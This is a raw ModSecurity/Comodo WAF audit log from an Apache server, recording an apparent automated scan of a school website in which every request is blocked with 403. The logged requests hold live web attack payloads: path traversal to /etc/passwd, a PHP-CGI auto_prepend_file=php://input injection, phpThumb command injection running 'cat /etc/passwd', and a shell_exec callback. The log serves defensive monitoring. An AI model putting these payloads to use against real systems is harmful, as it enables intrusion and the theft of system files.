Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ff4b010-Z-- --78050d6f-A-- [23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YVwAAAAM 103.236.140.4 38850 103.236.140.4 8181 --78050d6f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --78050d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78050d6f-E-- --78050d6f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829291783 2042 (- - -) Stopwatch2: 1745424829291783 2042; combined=696, p1=418, p2=250, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78050d6f-Z-- --517e4a1c-A-- [23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YWQAAABM 103.236.140.4 38856 103.236.140.4 8181 --517e4a1c-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --517e4a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --517e4a1c-E-- --517e4a1c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829487189 2233 (- - -) Stopwatch2: 1745424829487189 2233; combined=606, p1=412, p2=166, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --517e4a1c-Z-- --d5503e25-A-- [23/Apr/2025:23:15:47 +0700] aAkSM9Iw_rqnm4P5_afPWAAAAEo 103.236.140.4 42252 103.236.140.4 8181 --d5503e25-B-- GET /config.inc.php.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d5503e25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5503e25-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424947775940 1804 (- - -) Stopwatch2: 1745424947775940 1804; combined=711, p1=348, p2=337, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5503e25-Z-- --dc1c662f-A-- [23/Apr/2025:23:15:48 +0700] aAkSND1ahuoJLEjKiAU12wAAAJQ 103.236.140.4 42264 103.236.140.4 8181 --dc1c662f-B-- GET /config.inc.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dc1c662f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc1c662f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424948168932 2396 (- - -) Stopwatch2: 1745424948168932 2396; combined=791, p1=376, p2=384, p3=0, p4=0, p5=30, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc1c662f-Z-- --21bf7627-A-- [23/Apr/2025:23:15:49 +0700] aAkSNTI97BrbgvDq16Rt4AAAAMw 103.236.140.4 42314 103.236.140.4 8181 --21bf7627-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --21bf7627-C-- --21bf7627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21bf7627-E-- --21bf7627-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424949563684 4175 (- - -) Stopwatch2: 1745424949563684 4175; combined=2849, p1=502, p2=2320, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21bf7627-Z-- --f4cde14f-A-- [23/Apr/2025:23:15:50 +0700] aAkSNhuwXEWV6ydgl52ZrwAAABg 103.236.140.4 42342 103.236.140.4 8181 --f4cde14f-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f4cde14f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4cde14f-E-- --f4cde14f-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424950542484 2405 (- - -) Stopwatch2: 1745424950542484 2405; combined=726, p1=420, p2=267, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4cde14f-Z-- --a6ad954f-A-- [23/Apr/2025:23:15:52 +0700] aAkSONIw_rqnm4P5_afPYAAAAEE 103.236.140.4 42394 103.236.140.4 8181 --a6ad954f-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a6ad954f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ad954f-E-- --a6ad954f-H-- 
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424952159782 1604 (- - -) Stopwatch2: 1745424952159782 1604; combined=448, p1=317, p2=110, p3=0, p4=0, p5=21, sr=51, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ad954f-Z-- --ac81b245-A-- [23/Apr/2025:23:15:52 +0700] aAkSOBuwXEWV6ydgl52ZtQAAAAw 103.236.140.4 42418 103.236.140.4 8181 --ac81b245-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ac81b245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac81b245-E-- --ac81b245-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424952959579 2339 (- - -) Stopwatch2: 1745424952959579 2339; combined=721, p1=463, p2=221, p3=0, p4=0, p5=36, sr=120, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac81b245-Z-- --75c18344-A-- [23/Apr/2025:23:15:53 +0700] aAkSOTI97BrbgvDq16Rt5gAAAMc 103.236.140.4 42440 103.236.140.4 8181 --75c18344-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --75c18344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75c18344-E-- --75c18344-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424953560077 1795 (- - -) Stopwatch2: 1745424953560077 1795; combined=521, p1=354, p2=143, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75c18344-Z-- --3b669f36-A-- [23/Apr/2025:23:15:55 +0700] aAkSOz1ahuoJLEjKiAU18AAAAIY 103.236.140.4 42492 103.236.140.4 8181 --3b669f36-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3b669f36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b669f36-E-- --3b669f36-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955194439 1789 (- - -) Stopwatch2: 1745424955194439 1789; combined=541, p1=387, p2=133, p3=0, p4=0, p5=21, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b669f36-Z-- --91faaf77-A-- [23/Apr/2025:23:15:55 +0700] aAkSO9Iw_rqnm4P5_afPcQAAAE0 103.236.140.4 42494 103.236.140.4 8181 --91faaf77-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --91faaf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 
--91faaf77-E-- --91faaf77-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955390332 12326 (- - -) Stopwatch2: 1745424955390332 12326; combined=21763, p1=363, p2=136, p3=0, p4=0, p5=10647, sr=65, sw=0, l=0, gc=10617 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91faaf77-Z-- --2db1386a-A-- [23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZuwAAAAg 103.236.140.4 42504 103.236.140.4 8181 --2db1386a-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2db1386a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db1386a-E-- --2db1386a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955619556 2147 (- - -) Stopwatch2: 1745424955619556 2147; combined=621, p1=446, p2=146, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db1386a-Z-- --80b5541f-A-- [23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZvQAAABg 103.236.140.4 42510 103.236.140.4 8181 --80b5541f-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --80b5541f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80b5541f-E-- --80b5541f-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955831684 2302 (- - -) Stopwatch2: 1745424955831684 2302; combined=615, p1=420, p2=157, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80b5541f-Z-- --746c8452-A-- [23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18QAAAJI 103.236.140.4 42512 103.236.140.4 8181 --746c8452-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --746c8452-F-- HTTP/1.1 403 